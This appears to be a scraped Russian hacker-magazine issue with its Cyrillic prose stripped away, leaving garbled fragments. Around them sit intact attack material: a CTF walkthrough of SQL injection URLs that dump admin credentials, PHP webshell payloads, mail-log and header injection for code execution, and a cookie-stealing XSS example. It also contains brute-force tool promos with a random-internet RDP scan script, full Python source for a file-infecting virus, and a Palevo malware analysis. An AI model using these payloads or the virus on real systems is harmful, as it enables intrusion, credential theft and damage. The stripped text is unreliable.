http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='admins'+limit+2,1),0x3a,floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)*/,0)-+

login password admins.


http://172.16.0.2/search.php?action=0&text=1'/*!%2b(select+1+from(select+count(*),concat((select+concat_ws(0x3a,login,password)+from+admins+limit+0,1),0x3a,floor(rand(0)*2))x+from+admins+group+by+x)a)*/,0)--+

admins ( MD5- ).
MD5- .
MD5- (,
xmd5.org).
,
- :).
robots.txt,
-.
,
Remote File Including (RFI).
-


LFI over /var/mail

XSS
pdf- flash-
hr(109)||chr(115)||chr(117)||chr(115)||chr(101)||chr(
114)||chr(115)+limit+1+offset+1)::text::int--

SuEXEC
-
. ,
PHP. ,
: <?php passthru($_REQUEST['c']);?>.

RSA- , , RSA-,
SSH
.
SQLi->RFI->RSA .

2:

, , -,
SMS-.
SQL (selection-based)
PostgreSQL:
http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=cast(version()+as+numeric)


. , , -,
, -, . information_schema MySQL
5.x, :
http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+0)::text::int--
http://172.16.0.4/index.php?r=recovery&name=1&email=1&status=1;select(select+table_name+from+information_schema.tables+limit+1+offset+105)::text::int--

vsmsusers.
http://172.16.0.4/index.php?r=recovery&name=1&email=1&
status=1;select+(select+column_name+from+information_
schema.columns+where+table_name=chr(118)||chr(115)||c


login password vsmsusers.


,
, ,
(,

).
, ,
File Including (
Local File Including/LFI).
, , ,
, include().
PHP - (. raz0r.name/
releases/mega-reliz-samyj-korotkij-shell):
http://172.16.0.4/index.php?u=LV89284&p=data:,<?=@`$c`?>&c=ls

?
1. stream wrappers (data PHP
5.2.0);

2. short_open_tag register_globals ON;


3. <?= ?> <? echo ?>;
4.
shell_exec().

, (/
etc/passwd). , telnet (, THC-Hydra, Medusa,
ncrack),
.
, ,
. telnet
.

3:
-

-,
.
-,
- (path

-
pdf
traversal).

(
online- securitylab.ru/hq2010/list.php).
- : GET /../../../root/.history HTTP/1.1.
, .

4:

-, .
(
index.bak)
, :

, IP-
( blacklist.php). ,
-
HTTP_X_FORWARDED_FOR, ,
, IP-
X-Forwarded-For (
CuteNews).

X-Forwarded-For - : ';?><?eval($_GET['cmd']);?><?$a='.
, , , .

5: Cross-Site Scripting

XSS (,
, :)), XSS, DOM-based XSS (. owasp.
org/index.php/DOM_Based_XSS).
2005 , (. webappsec.org/projects/articles/071105.
shtml). , XSS ,
-
DOM -
JavaScript-. HTTP-
! :
...
Select your language:
<select><script>
document.write("<OPTION value=1>"+document.location.href.substring(document.location.href.indexOf("default=")+8)+"</OPTION>");
document.write("<OPTION value=2>English</OPTION>");
</script></select>

JavaScript-
default :

,
http://www.some.site/page.html#default=<script>alert(document.cookie)</script>

, -
JavaScript- url- ,

. , , ,
. -
( ) Cross-Site Scripting .
. .
HTML- .
:
...
</div>
<script>
document.write(unescape('%3Cimg%20src%3D%22/img/stat.png?site='+document.location.href+'%22%3E'));
</script>
</div>
</body>
</html>


, , , .
:
1. .
2. ,
JavaScript- (,
).
3. , .
4. , .
5. Profit!



RAZ0R HTTP://RAZ0R.NAME

1.
vasya.cc10.site:
echo Options +FollowSymLinks > /usr/local/www/data/vasya/.htaccess

2. , : ln -s /usr/local/www/data/root/.htaccess /usr/local/www/data/vasya/test.txt

3. ,
r00t.cc10.site: ln -s /usr/local/www/data/root/.htpasswd_new /usr/local/www/data/vasya/passwd.txt

4. MD5- (, PasswordsPro John the Ripper)


5. r00t.cc10.site
HTML-

6:

,
, -
Apache 80- ,
SMTP- DNS-. ,
-, DNS-.
? DNS-, .
DNS-, -: dig @172.16.0.10 PTR 10.0.16.172.in-addr.arpa
DNS-: dig @172.16.0.10 cc10.site axfr
DNS (
hosts).
Local File Including
.
SMTP-
(. xakep.ru/post/49508/default.asp). , :
telnet 172.16.0.10 25
ehlo cc10.site
mail from:any@cc10.site
rcpt to:vasya
data
<?php passthru($_GET['cmd']);?>
.
ENTER

SMTP-,
:
http://vasya.cc10.site/index.php?file=/var/mail/vasya%00&cmd=ls -la /

, .
SuEXEC, .

(. kernelpanik.org/docs/kernelpanik/
suexec.en.pdf). ,
-
AllowOverride All.
:


7: PDF

- () pdf-, -
. , pdf-
flash-.
, , , swf pdf-
zlib. swf- , , zlib Python.
- swf-.
swfdump
swftools. Obfuscate
.
, ,
:
00016) + 0:0 getlocal_0
00017) + 1:0 pushint 170
00018) + 2:0 pushint 42
00019) + 3:0 pushint 52
00020) + 4:0 pushint 120
00021) + 5:0 pushint 178
00022) + 6:0 pushint 249
00023) + 7:0 pushint 255
00024) + 8:0 pushint 228
00025) + 9:0 pushint 80
00026) + 10:0 pushint 32

,
-.
, SQL.

8:


.
,
, .

- (, , , 3D-)
,

. , , -.
HTML-!

TFTP-
, -
,
HTML-. .
.
. HTML- (
, %username%, ),
.
,
HTML- ,
, .
, .
,
, 0, , ,
1. , .

ASCII-. + .
, -
, HTML- ,
.

,
, TFTP-.
, , -
.
TFTP- (69/
udp), , .
. ,
router-config,
Cisco IOS. ,

(, tftptheft)
router-config.
- , .
secret 7 (, Cain&Abel).

9: Cisco

, ,
Cisco
IOS. TCP- ,
FINGER. ,

.
TELNET cisco ( Cisco). . ,
:).
cisco .

,
. Router#show
running-config view full
, .

10: TFTP

,
( ),
HQ2010.
xakepru.habrahabr.ru/.
, HQ2010!
HQ2010, . ,
, ,
aka D0znp, .
( , ESET SecurityLab),
. -! z



icq 884888, http://snipper.ru

X-TOOLS
: Fast RDP Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: ROleg

:
(MedWebGrasp, MWG)
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: iHornet

SQL-,
,
.
, , ,
- :
;
MySQL;

.

SQL !

- ! ,
, RDP
Fast RDP Brute! Qtss-,
RDP 5.
:
RDP 5;

( 30 120);
( 120
);
;
.



IP-. :
1.
nmap ( :
insecure.org).
2. :\Program Files\Nmap\scripts
rdp.nse (
).
3. .bat :
@echo off
for /l %%%x in (1,1,100) do (
start "rdp" /HIGH nmap -n -Pn -p
T:3389 -T5 --script rdp.nse -iR 0
)
exit

4. , , ,
:)

: frdpb.hut2.ru.



SQLinjection
(
all inclusive
).
:
( );


( );
( );

( );
, ( );
, ( );
( );

( );
( );
( );
( );
( ).

,

MS Access 2003! , -

, , :
1. SQL
:
http://mysite.com/show.php?id=3+union+select+1,2,user(),4,5--

2. .
3. ,
.
4. (
).
5.
SQL BSQL (
),

.
6. .
7. ,
.
8.
( ) , .
9.
(
, ,

,
*****[O1] ).
10. *pass*,*pwd*,*psw*, , .
11. , ,
,
* (
).
12.
*

* .
.
13.
.
14. , ,
, ,

.

,

(load_file)
magic_quotes.


.

:
/tmp/;

phpinfo() ;

*nix-;
;
.

.
(
) .

ReadMe
.

,
mwg.far.ru mwgrasp.oni.cc (,

).

: SSH Bruteforce
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Kaimi

SSH

SSH SSH
Bruteforce Kaimi!
:

,

:).

;
(
, ,
;);
IP
;
-
;
brute_good.txt;
IP ( IP
,

).

:
eval() $$var_name,

UTF-8.


kaimi.ru/2010/10/php-obfuscator-1-5.

: Rings Skyper
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Sin3v


: kaimi.
ru/2010/12/ssh-bruteforce.

: PHP Obfuscator 1.5


: *nix/win
: dx


Rings Skyper sin3v.org.

:
1. ;
2. ;
3. ;
4. .
:

PHP

PHP- PHP Obfuscator dx.
:
;
;
;
PHP;
INTEGER;
;
;
-;
PHP;

c
.

;

( );

( );
;

;
;
Skype,
;
, -;
;
3-5 .

,

:).
z


MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab

PALEVO!

Palevo
Mariposa. ,
2010 .
:
autorun.inf ,
, , .
, Palevo
.
.
PE 166 ,
. ,
, Explorer. ,
, ,
. String Table,
. , . Resource Hacker.
: .text, .rdata, .data .rsrc,
, -,
Gjgpycll. , .

Hiew? ,


PE- . .
, . , ,
. .
,
.
Hiew . ,
, , , , PE-.

.
IDA, Hex-Rays.
, ,

>> coding

Palevo
API-. , GetCommandLineW
EAX. ,
, , API EAX
.
.
. OpenProcess, ,
,
. , ESP,
MOV ecx, [esp-1Ch]. Windows XP (ESP
0x1C), , 0xFFFFFFFF.

RETN.
Palevo. ,
, , . :
add d, [eax] * 4 [000424C3A], 06B9700BA
inc eax
cmp eax, 00000013D
jl 000401110

ADD.
VirtualAlloc ,
.
.
. kernel32.dll
PEB .
, ,
, PE,
Hiew, .
, ADD.

. , , ,
Morphex PE32 Loader. ,

PE-. ,
,
.
, Palevo.
,
. MSVC8
. :
, .


explorer.exe.
Hex-rays ,
. ,
,
Progman , , ID , . ,
VirtualAllocEx, -
WriteProcessMemory
CreateRemoteThread. , Progman
Windows Explorer. , ,
-, explorer.exe. ?
, :
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\TaskBar . ,
TaskBar ,
, .
autorun.inf. , , ,
. autorun.inf :
shellexecute=vikipiki\\\rajlaus.exe
action=Open folderto view files usingWindowsExplore
USEAUTOPLAY=1



,
open=vikipiki\\\rajlaus.exe
icon=shell32.dll,4
shell\\\Install\\\command=vikipiki\\\rajlaus.exe
shell\\\open\\\command=vikipiki\\\rajlaus.exe
shell\\\explore\\\command=vikipiki\\\rajlaus.exe
Shell\\\open\\\command=vikipiki\\\rajlaus.exe
shellexecute=vikipiki\\\rajlaus.exe

, ,
:
******.ananikolic.su
****.pickeklosarske.ru
*****.pornicarke.com
*****.losmibracala.org
92.***.*90.237

.
, :
DONE!
FAIL!
Drive infected: %c
USBS stopped, %d infected
USBS not running
USBS already running

USBS started
Advertising: %s
Adware2 stopped, %d URLs displayed
Adware already running
Adware not running
Adware2 running: %d browsers, %d URLs
Error=%d, GLE=%d
Already downloaded id=%d
Downloading %s to %s
Done, %s

, Palevo
. ,
- .
,
Hiew / IDA.

, . ,
-
,
API . :)?
, , ,

explorer.exe.
autorun.inf . , Palevo
, ,
, . , ,
. z

Icon Group String Table`, Palevo


deeonis deeonis@gmail.com

Python


. ,
, ,
, ,

, , :
, , .
Python , .
, ,
HLLx (High Level Language, x ).
HLLx-:
(Overwrite) HLLO, (Companion) HLLC
(Parasitic) HLLP.
, ,
. .

. .
- , . , HLLC-


, (
. .) - . ,
,
. , . HLLP
-.
-, . -
,
, .
, , ,
, .
, HLLO-, HLLC- , -. ,
-.
,
.
HLLP-, . ,

.
. , ,
,
.
:
HLLP-
import sys
import os
import shutil
virPath = os.path.split(sys.argv[0]);
names = os.listdir('.');
fvir = open(sys.argv[0], 'rb');
virData = fvir.read(19456);
for name in names:
namePair = os.path.splitext(name);
if namePair[1] == '.exe' and \
name != virPath[1]:
os.rename(name, name + 'tmp');
fprog = open(name + 'tmp', 'rb');
progData = fprog.read();
fnew = open(name, wb);
fnew.write(virData + progData);
fnew.close();
fprog.close();
os.remove(name + 'tmp');
origProgData = fvir.read();
origProg = 'original_' + virPath[1];
forig = open(origProg, 'wb');
forig.write(origProgData);
fvir.close();
forig.close();


virPath = os.path.split(sys.argv[0]). ,
, .
if . fvir.
read(19456). 19456 (
, ,
). ,
.
exe . , ,
,
,
.

WARNING
warning

.

!
,

,

os.execl(origProg, ' ');

: sys, os,
shutil. sys ,

. , , sys.argv[0].
os ,
. ,
,
. , shutil
.

, .
os.listdir('.')
,
.
, , .
, ,
if :
name != virPath[1],

, Linux -

os.remove(name+'tmp').
,
.
( , 19456 ?), exe, .
,
.
, .
, ,
,
. ,
,
, .
.
.

,
.
,
.
, .
,
. ,
e-mail.
, Python
. , :



import smtplib
from email.mime.text import MIMEText
msg = MIMEText('Message text')
# me == email
# you == email
msg['Subject'] = 'Test message'
msg['From'] = me
msg['To'] = you
s = smtplib.SMTP('')
s.sendmail(me, [you], msg.as_string())
s.quit()

smtplib
MIMEText. , . , ,
SMTP-.
,
. ,
.
.
:

import smtplib
import mimetypes
from email import encoders
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase

outer = MIMEMultipart()
# me == email
# you == email
outer['Subject'] = 'Test message'
outer['From'] = me
outer['To'] = you
ctype, encoding = mimetypes.guess_type(path_to_file)
if ctype is None or encoding is not None:
    ctype = 'application/octet-stream'
maintype, subtype = ctype.split('/', 1)
fp = open(path_to_file, 'rb')
msg = MIMEBase(maintype, subtype)
msg.set_payload(fp.read())
fp.close()
encoders.encode_base64(msg)
msg.add_header('Content-Disposition', 'attachment', filename=file_name)
outer.attach(msg)
s = smtplib.SMTP('')
s.sendmail(me, [you], outer.as_string())
s.quit()

mimetypes,
encoders, MIMEMultipart MIMEBase. MIMEMultipart
-
(, ). MIMEBase , exe.
MIMEMultipart MIMEBase, base64 .
,

, ,
e-mail.
. , ,
, .
Outlook.
Python Win32 Extensions.

:
, exe .
Windows?.
exe. -, .
( , ,
][,
:)),
.
, , win-,
, .
os.path.split(). ,
-, sys.argv[0] (, virus.py). exe
(C:\Windows\virus.exe).
, os.path.split().
19456.
, exe, .
.

, Python , ,
. ,
:). z


UNIXOID
grinder@tux.in.ua
zobnin@gmail.com
adeptg@gmail.com

,
. ,
,
, , . ,
,
.


bash
PS1.
man-,
,

, -


. , , Ubuntu
PS1 :
'${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '


:
@_:_$

, '\u',
'\h',
'\w'. ,
debian_chroot,
,
chroot-. , , ,
, bash
.

INFO

info
FreeBSD
rsync


.

<Ctrl+T>
cp,


.

bash

alias, ,

, . :
\d
\j
\A
\!

, PS1
, ,
PS1 ,
, , ,
( $?),
, .
'\n' PS1,
,
(
):
PS1='\n\w\n\u@\h:$?\$ '

. chroot ,
,

. ,
, gmail
Wi-Fi:
$ vi ~/.bashrc
# Google-
weather(){
    # ?
    local city="Moscow"
    curl -s "http://www.google.com/ig/api?weather=$city" | sed 's|.*<temp_c data="\([^"]*\)"/>.*|\1|'
}
# Google-
unread_mail(){
    # ( @gmail.com)
    local login=""
    local password=""
    wget --secure-protocol=TLSv1 --timeout=3 -t 1 -q -O - --no-check-certificate "https://${login}:${password}@mail.google.com/mail/feed/atom" | grep fullcount | sed "s/<fullcount>\(.*\)<\/fullcount>/\1/"
}
# Wi-Fi
wifi(){
    /sbin/iwconfig wlan0 | grep Quality | cut -d = -f2 | awk '{print $1}'
}
PS1='\n`weather`:`unread_mail`:`wifi`:\w\n\u@\h:$?\$ '

~/.bashrc
600, .
:
-7:32:70/70:/usr/local
j1m@1313:0$


man-
,
most


export MANPAGER="/usr/bin/most -s"
~/.bashrc.
stty
-echo

,
.




.





setterm -cursor off
setterm -blank 0.

.
.
escape-
, .
escape- \[\033[
\], m.
. ,
0;30, 0;32,
0;31, 1;33, 1;37 .
( h)
(u), ,
(w), ~/.bashrc
PS1 :

HTTP://WWW
links

fortune-mod-ru:
jack.kiev.ua/fortunemod-ru
bashDirB (Directory Bookmarks for BASH):
dirb.info/bashDirB.

PS1="\[\033[0;31m\]\u@\h:\[\033[1;33m\](\w)\[\033[0m\]\[\033[0m\]"

.
40 () 47 ().
PS1="\[\033[32;40m\]\w\[\033[0m\]>"

, , , ,
. :
local GRAY="\[\033[1;30m\]"
local NO_COLOUR="\[\033[0m\]"

bash?
, bash
.
compgen, .
/etc/bash_completion ( ~/.bash_completion),
/etc/bash_completion.d,
, .
bash
.
, MPlayer avi mpg, :
complete -f -X '!*.@(avi|mpg|AVI|MPG)' mplayer

,
. :
alias ls='ls --color=auto'
alias grep='grep --color=auto'

.
dircolors, LC_COLORS.
, :

, MPlayer
, , , , .
case. ,
.

bash_completion. .
, tar :
COMPREPLY=( $( compgen -W 'c t x u r d A' -- "$cur" ) )

$ dircolors --print-database

/
etc/DIR_COLORS ( ~/.dir_colors),
.
cout (code.google.com/p/cout)
Python, make, gcc, svn
diff. ,
, :
$ alias makec='cout data/make-gcc.cfg'

, Makefile:
$ makec -f Makefile

bash

, bash <Tab>. , ,
.
-.
, Linux-,
, bash ,
. Gentoo ( Calculate Linux) .
. ?


, , bash .
compgen . '-b'
, '-c' , '-v'
. man-
bash, complete compgen.

Bash , .

dotfiles
dotfiles (IP- 192.168.1.1,
10000) netcat pv:
host1$ tar -cf - dotfiles | pv | nc -l -p 10000 -q 5
host2$ nc 192.168.1.1 10000 | pv | tar -xf -

, host1 OpenBSD, :
obsdhost1$ tar -cf - dotfiles | pv | nc -l 10000


-

, , setterm stty.
shopt -p (shopt
Shell Options). :
autocd ,
( cd), ;
cdspell bash (, /ect/init.d /etc/init.d) cd;;
checkjobs , ;
cmdhist ,
;
dirspell
;
globstar **, , , ;
wildchar ,
mp3 :
$ ls **/*.mp3

, , :

LC_COLORS
:
1. Bash ,
. PROMPT_DIRTRIM.
,
, . :

$ find ./ -name "*.mp3" -type f -print


$ export PROMPT_DIRTRIM=3

2. Bash ,
$ shopt -s autocd cdspell checkjobs cmdhist dirspell
globstar



, :
$ vi ~/.bashrc
twit()
{
    curl --basic --user : --data status="$*" 'http://twitter.com/statuses/update.xml' -o /dev/null;
}

:
$ twit ' '

140 .

ls.
ls, bg, fg, exit
:
$ export HISTIGNORE="&:ls:[bf]g:exit"

3. Bash , , sudo, root'


.
/etc/bash.bashrc:
export HISTFILE=$HOME/.bash_hist-`whoami`


, .
, mc, ,
. ,
, sync? rsync,
,
. ~/.bashrc :


fish

alias cpr='rsync --progress'

cpr cp:

Directory Bookmarks for BASH (dirb.info/bashDirB)


,
.
:

$ cpr file1 file2


$ wget -c http://www.dirb.info/bashDirB -o ~/.bashDirB

'--remove-source-files',
(, ,
mv rsync).
,
.
, , ,
pv (Pipe Viewer). cat,
, .
:
$ tar -czf - /path/to/dir | pv > /path/to/archive.tgz
758MB 0:01:29 [8,48MB/s] [
<=>

. .
pv ( ) '-s':
$ tar -czf - /path/to/dir | pv -s $(du -sb /path/to/dir | grep -o '[0-9]*') > /path/to/archive.tgz
461MB 0:00:21 [ 32MB/s] [=============================
==========>
] 60% ETA 0:00:13

,
.


. Bash
(, ,
cd, cd -), .
, (aliases), :
alias cdwww='cd /var/www'

, .
. , ,
~/.bashrc .


~/.bashrc :
source ~/.bashDirB

. :
$ cd /var/www
$ s www

~/.DirB/www,
. ,
, g www. .
. , p :
$ p www
/var/www
~

How much is the FISH?



FISH
(Friendly Interactive Shell). bash . Fish .
, , , (, ,
). Fish ,
, ,
, . ,
Fish sh.


tar

bash4
, , s1 .
'-r'.
, bashDirB
PS1 ,
history. ,
.
bashDirB apparix
(micans.org/apparix), : bm (
), to ( ) portal ( ). bash csh.
Debian/Ubuntu
.

Linux- . ,

. fortunes, .

, .
Debian Ubuntu, :

$ fortunes -f

/usr/share/games/fortunes, .
'-m'
, .
strfile
(strfile _).
RSS-, ,
, . fortunes
cowsay xcowsay. owsay Perl,
,
ASCII-.
$ sudo apt-get install cowsay xcowsay

, ,
. , uptime:
$ uptime | cowsay

( Linux Mint):
$ sudo apt-get install fortunes fortunes-debianhits fortunes-ubuntu-server fortunes-min fortune-mod
fortunes-ru


. , ,
fortunes-ru
(, linux.org.ru: lorquotes.ru/
fortunes.php).
.
~/.bashrc
:
$ echo "fortune" >> ~/.bashrc

( source ~/.bashrc). C
, :

$ cowsay 'fortune'

, /usr/share/cowsay/
cows. '-f'.
: '-t' ,
'-p' , '-w' . , ~/.bashrc:
COWDIR=/usr/share/cowsay/cows/;
# +1: sed -n '0p' is an error, so the index must start at 1
COWNUM=$(($RANDOM % $(ls $COWDIR | wc -l) + 1));
COWFILE=$(ls $COWDIR | sed -n "${COWNUM}p"); fortune | cowsay -f $COWFILE

, . , ,
, . z

zobnin@gmail.com



, -
.
, ,
UNIX-

.

, ,
.
,
( Windows
, UNIX
, ).
, ; 95%
Ubuntu,
deb-; xspy;
KDE GNOME,
, ,


... .
, , ,
,
.



,
Linux
chroot, FreeBSD
jail (), Solaris (,
, ).

,
. ,

.
,
, (

, , )
.
, .
, chroot
, .

,
, /
,
.
, .
, -
,
.
,
.
, ( ,
, ).

named systrace

,
,
- .
, .
,
: (
)
sudo. , , ,
KDE GNOME.

(600, ),
.
,
,
Linux,
,
(,
,
). .

,
,
.
, , ,
, ,
, ,
,

.



(, ,
). , Linux

.

,
, .
Linux
:
1. (HIDS),
SELinux AppArmor, ,
.
,
sandbox,
.
2. ptrace ,
,
.

,
, plash, sydbox systrace,
.
3. . Plan 9 Linux
procfs UTF-8,
clone()
. Linux, 2.4.19,
. , ,

/dev/sda1, ,
/dev/sda5, /home, procfs /proc,

INFO

info

,

,

fakeroot,

,

root (

).
QubesOS (qubesos.org) Linux,





.
sandbox,
SELinux,


/
home/$USER /tmp.

'-H' '-T': sandbox -H ~/fakehome -T ~/faketmp vi.


Sandbox
/dev/sda2,
, /dev/sda7, /root, /proc.
, , .
,
. 2.6
,
IPC. ,
, ( ) IPC.
LXC ,
, (stgraber.org).
4. seccomp
, , exit(), read() write()
, . ,
GRID ( ,

), Google
Chrome.
,
,
. , web-

exec() /etc/passwd,
, ?
:
1. ,
SELinux AppArmor.
, .
SELinux , ,
.
2. -. , .
,
TCP- - - .
, .
SELinux .
3. .

. ,
,
, ,
.


4. ,
. ,
Windows,
/ . , , ,

.
, , , ,
.
: sandbox,
SELinux
; systrace, ptrace; python-, .

Sandbox SELinux

Sandbox , SELinux
. SELinux,
, .
,
sandbox, . ,
; ; ,
sandbox, .
,
,
, . ,
sandbox . , , - . :
$ cat /etc/passwd | sandbox cut -d: -f1 > /tmp/users

cut, ,
,

2.2, Linux capabilities,



(,
,
).

systrace

sandbox,

( /etc/passwd)
/tmp/users (
). /etc/passwd,
, :
$ sandbox cut -d: -f1 /etc/passwd > /tmp/users
/bin/cut: /etc/passwd: Permission denied

- . sandbox ,
SELinux. , , ,
( sandbox_t,
system-config-selinux,
Fedora). , sandbox
,
'-t'. , SELinux.

,
sandbox
. '-X',
. -, X- Xephyr, X-

X-. Xephyr
Matchbox,
( Xephyr,
X-).
/tmp, ,
:
1. SELinux
$HOMEDIR /tmp.
2. SETUID- /usr/sbin/seunshare,
, ID SELinux .
3. seunshare ( , )
$HOMEDIR /tmp.
4. , X- /home /tmp.

SELinux: sandbox_file_t,
/tmp,
.
, ,
sandbox_web_t ( HTTP)
sandbox_net_t ( ):
$ sandbox -X -t sandbox_web_t firefox google.com

SElinux
selinux-policy 3.6.12
policycoreutils 2.0.62.


SYSTRACE /SYSJAIL SMP EXPLOIT

, OpenBSD/NetBSD- systrace, 2007

Systrace

, systrace system call interposition, NetBSD


OpenBSD, Linux,
ptrace- ( , )
,
.
systrace (
sandbox) ,

.
,
. , , strace.
Linux systrace ,
OpenBSD, :

$ systrace -t ls

,
, .
, , permit
() deny ().
, ,
.
systrace ,

, ,
, , exec().
systrace ,
'-A':
$ systrace -A ls

$ sudo apt-get install build-essential libevent-1.4-2 libevent-dev
$ wget http://www.provos.org/uploads/systrace-1.6g.tar.gz
$ tar -xzf systrace-1.6g.tar.gz
$ ./configure --prefix=/usr/local && make
$ sudo make install

systrace .
:
$ systrace ls

xsystrace .
xsystrace systrace,
:


~/.systrace:
$ ls -l /home/j1m/.systrace/
-rw------- 1 j1m j1m 631 2011-01-04 12:24 bin_ls

, ,
, ,

.

sandbox-2

Sandbox, ,
, , , .

systrace
,
,
, .
, , ,

, - .
, :
1. ( $NEWROOT) copy-on-write
( aufs).
2. /home $NEWROOT/home.
3. .
4. procfs $NEWROOT/proc.
5. chroot $NEWROOT .
,
,
, , /home ( ),
. IPC
, , .

, .
,
:
$ sudo apt-get install bzr
$ bzr branch lp:~stgraber/+junk/sandbox
$ cd sandbox; make
$ sudo make install

sandbox-gui,
( , /home /tmp)
. , .


, Linux
.
,
,
, .
z

iv ivinside.blogspot.com

-
-
Liberte Linux:


: ,

. ,
Liberte
Linux.
Liberte

Liberte Linux
LiveUSB-, ,
.
,
() , ,
.
,
,
:
(
Hardened Gentoo Linux);
;
;
Tor;
Tor (


2011.1);

.
,
Gentoo, , , . ,
SD-,
. , GTK; Openbox; X-
TrueType .
unicode- , .

Hardened Gentoo,
, SSP ( -

) ASLR (
).
:
Midori 0.2.8 , WebKit GTK;
Claws Mail 3.7.6

,
GnuPG;
Sakura 2.3.8 , VTE;
Audacious 2.4.0
(mp3, ogg, flac, ape);
GNOME Mplayer 0.9.9.2
GNOME , mplayer GTK;
PCManFM 0.9.7
(Midnight
Commander );

,
Liberte Linux: -
Evince 2.30.3 pdf ( DjVu);
Abiword 2.8.6, Gnumeric 1.10.6
Microsoft Word Excel.

(
dee.su/liberte, ),
256 .
, .
, 128 Pentium
Pro.
Linux:

1. : mkdir /media/usbstick.
2. : mount /dev/sdb1 /media/usbstick.
3. : unzip liberte-2010.1.zip -d /media/usbstick.
4. : cp /media/usbstick/liberte/setup.sh /tmp/setup.sh.
5. : chmod +x /tmp/setup.sh.
6. : umount /dev/sdb1.
7. : /tmp/setup.sh
syslinux
4.02,
.
Arch Linux,
syslinux 4.03 - :
$ head -n5 setup.sh
#!/bin/sh -e
# syslinux
sysver=4.03
# mbr.bin ( find / -name mbr.bin)
sysmbr=/usr/lib/syslinux/mbr.bin

Windows ,

setup.bat .
syslinux , .

It's easy to use!

, BIOS' , Liberte,



. , ,
, (Alt+F2). ,
,
.
usermod -U root passwd.
sudo,
,
.
Liberte Linux ,
OTFE
AES-256
XTS.
,
otfe-resize.

, .
$ cat /etc/conf.d/liberte
#
OTFEFILE=/otfe/liberte.vol
OTFELABEL="Liberte OTFE"
# , (A/B)
OTFESIZE=1/4

DVD
dvd
, ,
Liberte
Linux
Linux
Windows.

INFO

info
Install
Liberte
Linux

VirtualBox
.


FAT(16)
USB-.

# ,

OTFECIPHER=aes-xts-plain
OTFEKEYSIZE=256
OTFEHASH=sha256
# LVM
# ( otfe-resize)
OTFEVOLUME=otfe


GnuPG
GPA, .

OTFE.
, .
Midori


Liberte Linux

splash-
Tor. ,
Tor,
(, DNS-, ,
DHCP-, ),
.
, iptables -L .
DHCP, DNS, NTP Tor, DHCP ,
, ARP IPv4LL (IPv4 Link-Local Addresses) .
Wi-Fi MAC-
mac-randomize. , Liberte
, DNS
web-.
: ,
( ),
.

,
, M-16 .

,

. Liberte Linux

,
. , , 2011.1, , ,
.
,
, Claws-Mail. ,
, IRC XChat IM- Pidgin ,
.
mp4- Speex .
, Liberte , ,
Compiz. Liberte
, . , : , ,
.
Maxim Kammerer <mk@dee.su>, .

Liberte . Linux , Gentoo.


, rsync,
.
SquashFS Tools 4.1.
-
4 .

Privatix Live-System
.
Debian CD-, USB-.
USB LiveCD.
UsbCryptFormat,
CryptBackup
. Firefox
Torbutton.
3 .


Liberte Linux 2011.1

DemocraKey LiveCD
. ,
, . ,
,
, .
, ,
,
. : Tor,
(Pigdin + OTR).


!
:
1. (
svn,
):
svn co https://liberte.svn.sourceforge.net/svnroot/liberte/trunk/liberte liberte
2. /tmp/livecd:
liberte-2010.1-src/build /tmp/livecd
- svn, sourceforge.net:
$ wget https://downloads.sourceforge.net/project/liberte/2010.1/liberte-2010.1-src.tar.bz2
$ tar xjf liberte-2010.1-src.tar.bz2
$ mv liberte-201X.Y-src liberte
build fresh,
.
Liberte Linux LiveUSB-.
src/var/lib/portage/world
(, ,
) -

The (Amnesic) Incognito Live


System
Incognito
LiveCD , . , Incognito LiveCD,
CD-, .
, , -,
Tor, -,

.

GNOME,
GTK- (Firefox, OpenOffice, Pigdin
OTR )
2 ! , iso,
VirtualBox.


(
)

,
.
.
gentoo-portage.
com/browse.
/home/anon/ , , (, , ).
, , /etc.

Tor
. -, SSH-
, IP- .
, , ,
. ,
Tor e-mail ,

Liberte
Tor. (2010.1
)
, .
Liberte Linux I2P (
) , , DHT Kademlia, ,
, AES
IP-, ,
Network database .
.
,
mk@dee.su.

WARNING
warning
,
,

,
.

HTTP://WWW
links
dee.su/liberte
Liberte
Linux;
amnesia.boum.org
T(A)ILS;
mandalka.name/
privatix
Privatix LiveSystem;
sourceforge.net/
projects/democrakey

DemokraKey;
i2p2.de/intro_ru.html

;

- ,
. MS ,
:
z


CODING
stannic.man@gmail.com

RETURN-ORIENTED
ROOTKITS !


.
, ,


?

, , .
.
, -


. ,
, ,
.
, ,
( ).


,
, ,
, ,
, (root certification authority,
). , , , . ,

Microsoft, Windows XP. ,

,
() ,
. ?
,
.
, ,
:
( ,
WRITABLE |
EXECUTABLE).
OpenBSD 3.3, , PaX ExecShield Linux.
Windows
Data Execution Prevention (DEP),
Windows XP SP 2 Windows
Server 2003.
DEP .
2 (SP2) Windows XP
32- Windows : no-execute page-protection
(NX), AMD,
Execute Disable Bit (XD),
Intel. ,
DEP,
( ,
).
DEP : support.microsoft.com/
kb/875352/ru.
,
,
.
memory shadowing. ,

.
VM

. ( ,
)

.

,
. , , -
,
.
win-
Win2k Linux 2.4. ,

QEMU, VMware VirtualBox.

, , , .
,
-
(). - ( ,
)

. ? . ,
/,
,


. .
, .
.
. ,
return( __asm ret
), ( ) .
, return

-.

DVD
dvd

.

,


,
19 ,

,


.


?

, , .
ret . -,
4 EIP . -, ESP 4 ,
(2 ) ,
EIP.
, .
,
ret,
.
, return
. , -
ASM , , return- POP EAX; JMP EAX. ,
ret,
EAX
. return-

.
, ret
return- ? . 86- ret (3)
1/256.
, ( ,
) , .

,
.


Pro & Cons

- , ,
.
,

. ,
( EIP
ESP), .

#1:

? , , , :).
. , .

EIP -
.
,
. ESP
,
. , ,
,
EIP.

#2: vtable
++

C++ ,
(vtable).
, vtable, ,
? ,
,
,


vtable ,
.

. ,


. ,
vtable, , .

#3:

vtable,

.
-, ,
- .

. ,
.

#4:
setjmp

Linux . setjmp longjmp,


goto.
, ,
,
